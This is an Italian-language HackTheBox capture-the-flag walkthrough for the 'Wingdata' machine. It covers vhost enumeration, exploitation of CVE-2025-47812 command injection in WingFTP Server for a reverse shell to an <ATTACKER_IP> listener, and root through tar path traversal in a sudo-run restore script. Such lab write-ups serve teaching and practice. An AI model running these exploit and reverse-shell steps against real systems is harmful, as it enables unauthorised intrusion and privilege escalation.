
Walkthrough di HackTheBox Wingdata che copre l'iniezione di comandi di WingFTP CVE-2025-47812 per l'accesso iniziale e l'escalation di privilegi sudo tramite path traversal di tar fino a root.
Piattaforma: HackTheBox | OS: Linux
L'enumerazione dei VHost individua un server WingFTP. L'iniezione di comandi CVE-2025-47812 fornisce l'accesso iniziale. Root tramite uno script Python di ripristino eseguito con sudo che estrae un archivio tar appositamente creato — il path traversal di tar scrive un file arbitrario come root.
nmap -sC -sV wingdata.htb -Pn
22/tcp open ssh OpenSSH
80/tcp open http wingdata.htb main site
Aggiunto wingdata.htb a /etc/hosts. La porta 80 faceva riferimento a un dominio che indicava virtual hosting.
ffuf -u http://wingdata.htb -H 'Host: FUZZ.wingdata.htb' \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -ac
Trovato: ftp.wingdata.htb — interfaccia web di WingFTP Server.
CVE-2025-47812 è una vulnerabilità di iniezione di comandi nell'interfaccia web di WingFTP Server. Un parametro non sanificato consente di ottenere una reverse shell.
nc -lvnp 4444
python3 exploit_CVE-2025-47812.py --target http://ftp.wingdata.htb --lhost <ATTACKER_IP> --lport 4444
Shell ottenuta. Flag utente recuperata.
sudo -l
# (root) NOPASSWD: /usr/bin/python3 /opt/restore.py
/opt/restore.py accetta un archivio tar e lo estrae come root. tar non sanifica i percorsi — un archivio appositamente creato con ../ nel nome del file scrive file al di fuori della directory di estrazione.
python3 craft_tar.py
sudo /usr/bin/python3 /opt/restore.py -b backup_888.tar
Shell root ottenuta. Flag root in /root/root.txt.
A scopo puramente didattico. Testare solo sistemi di propria proprietà o per i quali si dispone di esplicita autorizzazione.